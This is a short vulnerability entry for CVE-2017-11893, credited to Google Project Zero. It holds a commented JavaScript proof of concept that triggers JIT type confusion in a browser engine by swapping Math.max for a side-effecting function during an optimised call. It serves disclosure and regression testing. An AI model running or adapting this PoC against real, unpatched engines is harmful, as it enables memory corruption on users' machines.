CVE-2017-11893

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

/**
 * The function the PoC gets optimised: two number stores to arr[0] with a
 * Math.max.apply call between them.
 *
 * The body is ordinary JavaScript; what matters is the call in the middle.
 * NOTE(review): presumably the optimised code keeps its assumptions about
 * arr's element representation across that call instead of re-checking them
 * after a call that can run arbitrary script. Confirm against the advisory;
 * the page itself gives no root-cause text.
 *
 * @param {Array} arr - array whose element 0 is written twice.
 * @param {*} arr2 - used as the argument list for Math.max.apply; main()
 *   passes an array while warming up and a plain object on the last call.
 */
function opt(arr, arr2) {
    // First store: a floating-point number into element 0.
    arr[0] = 1.1;
    // Whatever Math.max is bound to at call time runs here, so this call can
    // have side effects on arr (main() arranges exactly that).
    Math.max.apply(Math, arr2);
    // Second store, after the call: this is the write whose safety depends on
    // arr still being the kind of array it was before the call.
    arr[0] = 2.3023e-320;
}

/**
 * Drives the PoC: warms up opt() with well-behaved arguments, replaces
 * Math.max with a function that changes what arr holds, then calls opt() once
 * more and prints arr[0].
 *
 * By language semantics the last store in opt() runs after the replacement
 * Math.max returns, so a correct engine prints the number 2.3023e-320. That
 * makes the printed value usable as a regression check for the fix.
 */
function main() {
    // Array literal containing only floating-point numbers.
    let arr = [1.1, 2.2, 3.3, 4.4];
    // Repeated calls with plain arrays; presumably enough iterations to get
    // opt() compiled by the optimising JIT (threshold is engine-specific).
    for (let i = 0; i < 10000; i++) {
        opt(arr, [1, 2, 3, 4]);
    }

    // Swap the global Math.max for a function with a side effect on arr:
    // it stores an object into element 0.
    Math.max = function () {
        arr[0] = {};
    };

    // Final call passes a plain object instead of an array. Per the original
    // comment, the optimised path cannot handle that argument and falls back
    // to actually calling Math.max, which is now the replacement above.
    opt(arr, {});  // can't handle, calls Math.max
    // print is not standard ECMAScript; presumably the engine shell's output
    // function. Expected output on a fixed engine: 2.3023e-320.
    print(arr[0]);
}

// Entry point: run the PoC once when the script is loaded.
main();

Reference